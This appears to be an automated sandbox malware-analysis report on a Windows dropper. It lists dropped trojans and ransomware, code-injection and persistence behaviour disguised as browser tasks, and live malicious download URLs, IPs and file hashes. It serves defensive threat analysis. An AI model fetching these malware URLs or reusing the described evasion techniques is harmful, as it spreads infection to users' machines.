C:\Users\user\AppData\Roaming\jejhieg, PE32 21->47 dropped 49 C:\Users\user\AppData\Roaming\bejhieg, PE32 21->49 dropped 51 C:\Users\user\AppData\Local\Temp\C5EA.exe, PE32 21->51 dropped 53 9 other files (8 malicious) 21->53 dropped 99 System process connects to network (likely due to code injection or exploit) 21->99 101 Benign windows process drops PE files 21->101 103 Deletes itself after installation 21->103 105 Hides that the sample has been downloaded from the Internet (zone.identifier) 21->105 26 8615.exe 1 21->26         started        30 66A4.exe 21 6 21->30         started        33 C5EA.exe 21->33         started        35 5 other processes 21->35 file10 signatures11 process12 dnsIp13 55 C:\Users\user\AppData\Local\Temp\1105.tmp, PE32 26->55 dropped 115 Multi AV Scanner detection for dropped file 26->115 117 DLL reload attack detected 26->117 119 Detected unpacking (changes PE section rights) 26->119 137 5 other signatures 26->137 75 cdn.discordapp.com 162.159.130.233, 443, 49804, 49805 CLOUDFLARENETUS United States 30->75 57 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 30->57 dropped 121 Machine Learning detection for dropped file 30->121 123 Writes to foreign memory regions 30->123 139 3 other signatures 30->139 37 AdvancedRun.exe 1 30->37         started        125 Contains functionality to inject code into remote processes 33->125 127 Injects a PE file into a foreign processes 33->127 39 C5EA.exe 33->39         started        77 91.219.236.97, 49847, 80 SERVERASTRA-ASHU Hungary 35->77 79 93.115.20.139, 28978, 49842 MVPShttpswwwmvpsnetEU Romania 35->79 81 4 other IPs or domains 35->81 59 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 35->59 dropped 61 C:\Users\user\AppData\LocalLow\sqlite3.dll, PE32 35->61 dropped 129 Antivirus detection for dropped file 35->129 131 Detected unpacking (overwrites its own PE header) 35->131 133 Early bird code injection technique detected 35->133 135 Queues an APC in another process (thread injection) 35->135 42 977B.exe 35->42         started        file14 signatures15 process16 file17 45 AdvancedRun.exe 37->45         started        107 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 39->107 109 Maps a DLL or memory area into another process 39->109 111 Checks if the current machine is a virtual machine (disk enumeration) 39->111 113 Creates a thread in another existing process (thread injection) 39->113 63 C:\Users\user\AppData\Local\...\sqtvvs.exe, PE32 42->63 dropped signatures18 process19

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        cnv622JnZv.exe100%Joe Sandbox ML

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Local\Temp\977B.exe100%AviraHEUR/AGEN.1138925
                        C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe100%AviraHEUR/AGEN.1138925
                        C:\Users\user\AppData\Local\Temp\152F.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\B084.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Roaming\bejhieg100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\977B.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\A557.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\8615.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\77DC.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Roaming\jejhieg100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\66A4.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\C5EA.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\LocalLow\sqlite3.dll0%MetadefenderBrowse
                        C:\Users\user\AppData\LocalLow\sqlite3.dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\1105.tmp0%MetadefenderBrowse
                        C:\Users\user\AppData\Local\Temp\1105.tmp2%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe3%MetadefenderBrowse
                        C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\152F.exe47%ReversingLabsWin32.Trojan.Krypter
                        C:\Users\user\AppData\Local\Temp\66A4.exe39%ReversingLabsByteCode-MSIL.Trojan.CrypterX
                        C:\Users\user\AppData\Local\Temp\8615.exe80%ReversingLabsWin32.Ransomware.StopCrypt
                        C:\Users\user\AppData\Local\Temp\A557.exe43%ReversingLabsByteCode-MSIL.Trojan.Heracles
                        C:\Users\user\AppData\Local\Temp\B084.exe57%ReversingLabsWin32.Trojan.Raccrypt

                        Unpacked PE Files

                        SourceDetectionScannerLabelLinkDownload
                        34.0.977B.exe.400000.11.unpack100%AviraTR/AD.Amadey.ezxiuDownload File
                        3.0.cnv622JnZv.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        33.3.B084.exe.2b70000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        3.2.cnv622JnZv.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        18.0.C5EA.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        34.2.977B.exe.400000.0.unpack100%AviraHEUR/AGEN.1143239Download File
                        19.0.jejhieg.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        34.0.977B.exe.700000.6.unpack100%AviraHEUR/AGEN.1138925Download File
                        18.2.C5EA.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        34.0.977B.exe.700000.12.unpack100%AviraHEUR/AGEN.1138925Download File
                        34.0.977B.exe.400000.15.unpack100%AviraTR/AD.Amadey.ezxiuDownload File
                        18.0.C5EA.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                        24.2.8615.exe.2fb0e50.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        34.0.977B.exe.700000.18.unpack100%AviraHEUR/AGEN.1138925Download File
                        19.0.jejhieg.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        34.2.977B.exe.700000.1.unpack100%AviraHEUR/AGEN.1138925Download File
                        18.0.C5EA.exe.400000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                        34.0.977B.exe.700000.10.unpack100%AviraHEUR/AGEN.1138925Download File
                        19.1.jejhieg.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        33.2.B084.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        18.1.C5EA.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        16.2.jejhieg.2cc15a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        18.0.C5EA.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        26.0.977B.exe.8d0000.1.unpack100%AviraHEUR/AGEN.1138925Download File
                        34.0.977B.exe.400000.9.unpack100%AviraTR/AD.Amadey.ezxiuDownload File
                        0.2.cnv622JnZv.exe.2dc15a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        34.0.977B.exe.700000.16.unpack100%AviraHEUR/AGEN.1138925Download File
                        26.0.977B.exe.8d0000.0.unpack100%AviraHEUR/AGEN.1138925Download File
                        34.0.977B.exe.700000.3.unpack100%AviraHEUR/AGEN.1138925Download File
                        19.0.jejhieg.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                        34.0.977B.exe.700000.1.unpack100%AviraHEUR/AGEN.1138925Download File
                        34.0.977B.exe.700000.0.unpack100%AviraHEUR/AGEN.1138925Download File
                        19.0.jejhieg.400000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                        34.0.977B.exe.400000.5.unpack100%AviraTR/AD.Amadey.ezxiuDownload File
                        19.2.jejhieg.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        3.1.cnv622JnZv.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        34.0.977B.exe.700000.2.unpack100%AviraHEUR/AGEN.1138925Download File
                        18.0.C5EA.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        34.0.977B.exe.700000.14.unpack100%AviraHEUR/AGEN.1138925Download File
                        34.0.977B.exe.400000.7.unpack100%AviraTR/AD.Amadey.ezxiuDownload File
                        33.2.B084.exe.2b60e50.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        24.3.8615.exe.2fc0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        26.0.977B.exe.8d0000.2.unpack100%AviraHEUR/AGEN.1138925Download File
                        34.0.977B.exe.700000.4.unpack100%AviraHEUR/AGEN.1138925Download File
                        19.0.jejhieg.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        19.0.jejhieg.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                        3.0.cnv622JnZv.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        19.0.jejhieg.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                        26.0.977B.exe.8d0000.3.unpack100%AviraHEUR/AGEN.1138925Download File
                        34.0.977B.exe.700000.8.unpack100%AviraHEUR/AGEN.1138925Download File
                        17.2.C5EA.exe.2ba15a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        34.0.977B.exe.400000.13.unpack100%AviraTR/AD.Amadey.ezxiuDownload File
                        24.2.8615.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        3.0.cnv622JnZv.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                        18.0.C5EA.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                        26.2.977B.exe.8d0000.0.unpack100%AviraHEUR/AGEN.1138925Download File
                        18.0.C5EA.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                        34.0.977B.exe.400000.17.unpack100%AviraTR/AD.Amadey.ezxiuDownload File
                        24.1.8615.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://tempuri.org/DetailsDataSet1.xsd0%Avira URL Cloudsafe
                        http://91.219.236.97//l/f/wJ2RyXwB3dP17SpzKGLv/8868635484462b34cd9494990ed8c03cf2975861(0%Avira URL Cloudsafe
                        http://sysaheu90.top/game.exe16%VirustotalBrowse
                        http://sysaheu90.top/game.exe100%Avira URL Cloudmalware
                        http://91.219.236.97/0%Avira URL Cloudsafe
                        http://91.svchost.exe0%Avira URL Cloudsafe
                        https://toptelete.top/agrybirdsgamerept100%Avira URL Cloudmalware
                        http://91.219.236.97/.top&)0%Avira URL Cloudsafe
                        http://telegalive.top/O100%Avira URL Cloudmalware
                        http://toptelete.top/agrybirdsgamerept100%Avira URL Cloudmalware
                        http://privacytoolzforyou-6000.top/downloads/toolspab2.exe100%Avira URL Cloudmalware
                        http://hajezey1.top/100%Avira URL Cloudmalware
                        http://telegalive.top/100%Avira URL Cloudmalware
                        http://91.219.236.97//l/f/wJ2RyXwB3dP17SpzKGLv/8868635484462b34cd9494990ed8c03cf29758610%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        privacytoolzforyou-6000.top
                        185.98.87.159
                        truefalse
                          high
                          toptelete.top
                          172.67.160.46
                          truefalse
                            high
                            cdn.discordapp.com
                            162.159.130.233
                            truefalse
                              high
                              znpst.top
                              61.98.7.132
                              truefalse
                                high
                                nusurtal4f.net
                                45.141.84.21
                                truefalse
                                  high
                                  hajezey1.top
                                  185.98.87.159
                                  truefalse
                                    high
                                    sysaheu90.top
                                    185.98.87.159
                                    truefalse
                                      high
                                      telegalive.top
                                      unknown
                                      unknownfalse
                                        high
                                        xacokuo8.top
                                        unknown
                                        unknownfalse
                                          high

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          http://sysaheu90.top/game.exetrue
                                          • 16%, Virustotal, Browse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://cdn.discordapp.com/attachments/893177342426509335/903702020781907998/4D0A6361.jpgfalse
                                            high
                                            http://91.219.236.97/true
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://cdn.discordapp.com/attachments/893177342426509335/902526117016109056/AB0F9338.jpgfalse
                                              high
                                              https://cdn.discordapp.com/attachments/893177342426509335/902526114763767818/A623D0D3.jpgfalse
                                                high
                                                http://toptelete.top/agrybirdsgamerepttrue
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://cdn.discordapp.com/attachments/893177342426509335/903575517888925756/6D9E3C88.jpgfalse
                                                  high
                                                  http://privacytoolzforyou-6000.top/downloads/toolspab2.exetrue
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  http://hajezey1.top/true
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  https://cdn.discordapp.com/attachments/893177342426509335/903575519373697084/F83CB811.jpgfalse
                                                    high
                                                    http://91.219.236.97//l/f/wJ2RyXwB3dP17SpzKGLv/8868635484462b34cd9494990ed8c03cf2975861true
                                                    • Avira URL Cloud: safe
                                                    unknown

                                                    URLs from Memory and Binaries

                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    http://tempuri.org/DetailsDataSet1.xsdA557.exe, A557.exe, 0000001D.00000000.427496231.00000000002D2000.00000002.00020000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://91.219.236.97//l/f/wJ2RyXwB3dP17SpzKGLv/8868635484462b34cd9494990ed8c03cf2975861(152F.exe, 00000023.00000003.505435036.0000000002F2C000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://91.svchost.exe152F.exe, 00000023.00000003.505077428.0000000002EEE000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://cdn.discordapp.com/attachments/8A557.exefalse
                                                      high
                                                      https://toptelete.top/agrybirdsgamerept152F.exe, 00000023.00000003.505195772.0000000002EFB000.00000004.00000001.sdmptrue
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://telegram.org/img/t_logo.png152F.exe, 00000023.00000003.505195772.0000000002EFB000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://fontello.com77DC.exefalse
                                                          high
                                                          http://91.219.236.97/.top&)152F.exe, 00000023.00000003.505077428.0000000002EEE000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://telegalive.top/O152F.exe, 00000023.00000003.497798547.0000000002EDB000.00000004.00000001.sdmptrue
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          http://www.nirsoft.net/AdvancedRun.exe, AdvancedRun.exe, 0000001E.00000000.426329937.000000000040C000.00000002.00020000.sdmpfalse
                                                            high
                                                            http://telegalive.top/152F.exe, 00000023.00000003.497798547.0000000002EDB000.00000004.00000001.sdmptrue
                                                            • Avira URL Cloud: malware
                                                            unknown

                                                            Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            185.98.87.159
                                                            privacytoolzforyou-6000.topRussian Federation
                                                            205840VM-HOSTINGRUfalse
                                                            162.159.130.233
                                                            cdn.discordapp.comUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            91.219.236.97
                                                            unknownHungary
                                                            56322SERVERASTRA-ASHUtrue
                                                            172.67.160.46
                                                            toptelete.topUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            216.128.137.31
                                                            unknownUnited States
                                                            20473AS-CHOOPAUStrue
                                                            93.115.20.139
                                                            unknownRomania
                                                            202448MVPShttpswwwmvpsnetEUfalse
                                                            162.159.133.233
                                                            unknownUnited States
                                                            13335CLOUDFLARENETUSfalse

                                                            Private

                                                            IP
                                                            192.168.2.1

                                                            General Information

                                                            Joe Sandbox Version:34.0.0 Boulder Opal
                                                            Analysis ID:511932
                                                            Start date:29.10.2021
                                                            Start time:20:08:25
                                                            Joe Sandbox Product:CloudBasic
                                                            Overall analysis duration:0h 17m 10s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:light
                                                            Sample file name:cnv622JnZv.exe
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                            Number of analysed new started processes analysed:42
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:1
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • HDC enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Detection:MAL
                                                            Classification:mal100.troj.expl.evad.winEXE@41/20@58/8
                                                            EGA Information:Failed
                                                            HDC Information:
                                                            • Successful, ratio: 30.7% (good quality ratio 21.4%)
                                                            • Quality average: 46.5%
                                                            • Quality standard deviation: 38%
                                                            HCA Information:
                                                            • Successful, ratio: 59%
                                                            • Number of executed functions: 0
                                                            • Number of non-executed functions: 0
                                                            Cookbook Comments:
                                                            • Adjust boot time
                                                            • Enable AMSI
                                                            • Found application associated with file extension: .exe
                                                            Warnings:
                                                            Show All
                                                            • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                            • HTTP Packets have been reduced
                                                            • TCP Packets have been reduced to 100
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                            • Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.211.4.86, 20.50.102.62, 173.222.108.226, 173.222.108.210, 40.112.88.60, 80.67.82.235, 80.67.82.211, 20.82.210.154
                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, wu-shim.trafficmanager.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            20:10:12Task SchedulerRun new task: Firefox Default Browser Agent 59A8FD1B8869484D path: C:\Users\user\AppData\Roaming\jejhieg
                                                            20:10:53AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Chrome C:\Users\user\AppData\Local\Temp\977B.exe
                                                            20:10:56API Interceptor1x Sleep call for process: explorer.exe modified
                                                            20:11:04AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Chrome C:\Users\user\AppData\Local\Temp\977B.exe
                                                            20:11:05API Interceptor36x Sleep call for process: powershell.exe modified
                                                            20:11:06API Interceptor8x Sleep call for process: 152F.exe modified
                                                            20:11:24Task SchedulerRun new task: sqtvvs.exe path: C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe
                                                            20:11:33Task SchedulerRun new task: Firefox Default Browser Agent EE8C025280F83964 path: C:\Users\user\AppData\Roaming\bejhieg
                                                            20:11:39Task SchedulerRun new task: Firefox Default Browser Agent 48DDC4FB34E7A237 path: C:\Users\user\AppData\Roaming\gujhieg

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            No context

                                                            Domains

                                                            No context

                                                            ASN

                                                            No context

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\LocalLow\1xVPfvJcrg
                                                            Process:C:\Users\user\AppData\Local\Temp\152F.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                            MD5:72A43D390E478BA9664F03951692D109
                                                            SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                            SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                            SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            C:\Users\user\AppData\LocalLow\RYwTiizs2t
                                                            Process:C:\Users\user\AppData\Local\Temp\152F.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                            MD5:72A43D390E478BA9664F03951692D109
                                                            SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                            SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                            SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            C:\Users\user\AppData\LocalLow\frAQBc8Wsa
                                                            Process:C:\Users\user\AppData\Local\Temp\152F.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                            MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                            SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                            SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                            SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            C:\Users\user\AppData\LocalLow\rQF69AzBla
                                                            Process:C:\Users\user\AppData\Local\Temp\152F.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoIL4rtEy80:T5LLOpEO5J/Kn7U1uBoI+j
                                                            MD5:3806E8153A55C1A2DA0B09461A9C882A
                                                            SHA1:BD98AB2FB5E18FD94DC24BCE875087B5C3BB2F72
                                                            SHA-256:366E8B53CE8CC27C0980AC532C2E9D372399877931AB0CEA075C62B3CB0F82BE
                                                            SHA-512:31E96CC89795D80390432062466D542DBEA7DF31E3E8676DF370381BEDC720948085AD495A735FBDB75071DE45F3B8E470D809E863664990A79DEE8ADC648F1C
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            C:\Users\user\AppData\LocalLow\sqlite3.dll
                                                            Process:C:\Users\user\AppData\Local\Temp\152F.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:24576:BJDwWdxW2SBNTjlY24eJoyGttl3+FZVpsq/2W:BJDvx0BY24eJoyctl3+FTX
                                                            MD5:F964811B68F9F1487C2B41E1AEF576CE
                                                            SHA1:B423959793F14B1416BC3B7051BED58A1034025F
                                                            SHA-256:83BC57DCF282264F2B00C21CE0339EAC20FCB7401F7C5472C0CD0C014844E5F7
                                                            SHA-512:565B1A7291C6FCB63205907FCD9E72FC2E11CA945AFC4468C378EDBA882E2F314C2AC21A7263880FF7D4B84C2A1678024C1AC9971AC1C1DE2BFA4248EC0F98C4
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Reputation:unknown
                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....t\...........!.....Z...................p.....a.......................................... .......................... ......H.... .......................0...3...................................................................................text...XX.......Z..................`.P`.data........p.......`..............@.`..rdata........... ...|..............@.`@.bss....(.............................`..edata... ......."..................@.0@.idata..H...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc........ ......................@.0..reloc...3...0...4..................@.0B/4...........p......................@.@B/19................................@..B/31.......... ......................@..B/45..........@......................@..B/57..........`......................@.0B/70.....i....p..........
                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\66A4.exe.log
                                                            Process:C:\Users\user\AppData\Local\Temp\66A4.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1039
                                                            Entropy (8bit):5.365622957937216
                                                            Encrypted:false
                                                            SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7K84jE4Ks:MxHKXwYHKhQnoPtHoxHhAHKzvKvjHKs
                                                            MD5:AE8CFF33270358D6EC23793128B3EF2F
                                                            SHA1:5E6B156157EDEA4222A5E0C258AE9ADEBB8CB7CE
                                                            SHA-256:498EAB9F855E7CE9B812EAD41339A9475127F0C8E7249033B975071D2292220C
                                                            SHA-512:473111AD332D5E66724AFB0CE5A1E1C97890D60484A818D1DB8C2386A99C05BAE6C9D5C535DDFB6790BF5707C153502B938BE201393A3D70342A62902E0A3C98
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutra
                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\977B.exe.log
                                                            Process:C:\Users\user\AppData\Local\Temp\977B.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):520
                                                            Entropy (8bit):5.345981753770044
                                                            Encrypted:false
                                                            SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhav:MLUE4K5E4Ks2wKDE4KhK3VZ9pKhk
                                                            MD5:044A637E42FE9A819D7E43C8504CA769
